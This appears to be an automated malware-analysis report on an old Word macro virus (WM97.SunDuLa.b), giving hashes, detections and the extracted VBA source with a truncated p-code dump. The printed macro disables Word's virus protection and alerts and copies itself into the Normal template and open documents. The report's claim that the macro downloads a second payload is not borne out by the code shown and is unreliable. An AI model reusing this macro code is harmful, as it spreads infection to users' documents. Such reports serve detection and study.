Doc.Trojan.Sundula-2 Office (OLE) malware analysis — malicious · 6b1f08e81361d8cb

MALICIOUS

Office (OLE)

29.5 KB Created: 1999-03-25 03:43:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 2292b0a285a3d4a4f229088e9ef198a4 SHA-1: 0f91ae8d80686fa9e191d10dc4b12a186bec7be2 SHA-256: 6b1f08e81361d8cbd3857b77f4a243ab76f9631be60cd3d33a023e2e5511cfb8

140 Risk Score

Malware Insights

Doc.Trojan.Sundula-2 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as Doc.Trojan.Sundula-2 by ClamAV, indicating a known malicious document. It contains VBA macros that attempt to disable security features and execute obfuscated code. The macro's intent appears to be to download and execute a secondary payload, as suggested by the disabling of virus protection and the structure of the code.

Heuristics 2

ClamAV: Doc.Trojan.Sundula-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Sundula-2
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8827 bytes
SHA-256: `584797f42789fc494c6461e6808a1f4486cb041854430b4800b67bccbfb35a34`
Detection ClamAV: Doc.Trojan.Sundula-2 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'WM97.SunDuLa.b Private Sub Document_Close() On Error Resume Next With Options .VirusProtection = False .SaveNormalPrompt = False .ConfirmConversions = False End With With Application .ScreenUpdating = False .DisplayStatusBar = False .DisplayAlerts = False End With Set norm = NormalTemplate.VBProject.VBComponents(1).codemodule Set doc = ActiveDocument.VBProject.VBComponents(1).codemodule If norm.Lines(1, 1) <> "'WM97.SunDuLa.b" Then norm.DeleteLines 1, norm.CountOfLines norm.InsertLines 1, doc.Lines(1, doc.CountOfLines) norm.replaceline 71, "Sub ViewVBcode()" ElseIf doc.Lines(1, 1) <> "'WM97.SunDuLa.b" Then doc.DeleteLines 1, doc.CountOfLines doc.InsertLines 1, norm.Lines(1, norm.CountOfLines) doc.replaceline 71, "Sub Toolsmacro()" ActiveDocument.SaveAs FileName:=ActiveDocument.FullName End If Randomize If Int(Rnd * 12) = 2 Then Application.EnableCancelKey = wdCancelDisabled ShowVisualBasicEditor = False Dim RandomNumber As Integer RandomNumber = Int((Val(14) * Rnd) + 1) Select Case RandomNumber Case 1 MsgBox "Squirrels have fluffy tails!!", vbInformation, "Did you know?" Case 2 MsgBox "Baboons have red butts!!", vbInformation, "Did you know?" Case 3 MsgBox "Cows sleep standing up!!", vbInformation, "Did you know?" Case 4 MsgBox "The average penis is 6 inchs long!!", vbInformation, "Did you know?" Case 5 MsgBox "The average vagina is 9 inchs deep!!", vbInformation, "Did you know?" Case 6 MsgBox "Flying squirrels don't fly they glide!!", vbInformation, "Did you know?" Case 7 MsgBox "Life sucks!!", vbInformation, "Did you know?" Case 8 MsgBox "Vampires are not real!!", vbInformation, "Did you know?" Case 9 MsgBox "Werewolfs are not real!!", vbInformation, "Did you know?" Case 10 MsgBox "The most dangerous wild animal is a deer!!", vbInformation, "Did you know" Case 11 MsgBox "The platypus is the only mammal that lays eggs!!", vbInformation, "Did you know?" Case 12 MsgBox "Flys live for about two days!!", vbInformation, "Did you know?" Case 13 MsgBox "Turtles have shells!!", vbInformation, "Did you know?" Case 14 MsgBox "Fish live in water!!", vbInformation, "Did you know?" Case 15 MsgBox "You are infected with WM97.SunDuLa By Psyclone X [PE]!!", vbInformation, "Did you know?" End Select End If End Sub Sub Toolsmacro() End Sub ' Processing file: /opt/analyzer/scan_staging/484e8bd9fd064d9ea9ba5f49f4e017c4.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 4880 bytes ' Line #0: ' QuoteRem 0x0000 0x000E "WM97.SunDuLa.b" ' Line #1: ' FuncDefn (Private Sub Document_Close()) ' Line #2: ' OnError (Resume Next) ' Line #3: ' Line #4: ' StartWithExpr ' Ld Options ' With ' Line #5: ' LitVarSpecial (False) ' MemStWith VirusProtection ' Line #6: ' LitVarSpecial (False) ' MemStWith SaveNormalPrompt ' Line #7: ' LitVarSpecial (False) ' MemStWith ConfirmConversions ' Line #8: ' EndWith ' Line #9: ' Line #10: ' StartWithExpr ' Ld Application ' With ' Line #11: ' LitVarSpecial (False) ' MemStWith ScreenUpdating ' Line #12: ' LitVarSpecial (False) ' MemStWith DisplayStatusBar ' Line #13: ' LitVarSpecial (False) ' MemStWith DisplayAlerts ' Line #14: ' EndWith ' Line #15: ' Line #16: ' SetStmt ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd codemodule ' Set norm ' Line #17: ' SetStmt ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd codemodule ' Set doc ' Line #18: ' Line #19: ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld norm ' ArgsMemLd Lines 0x0002 ' LitStr 0x000F ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.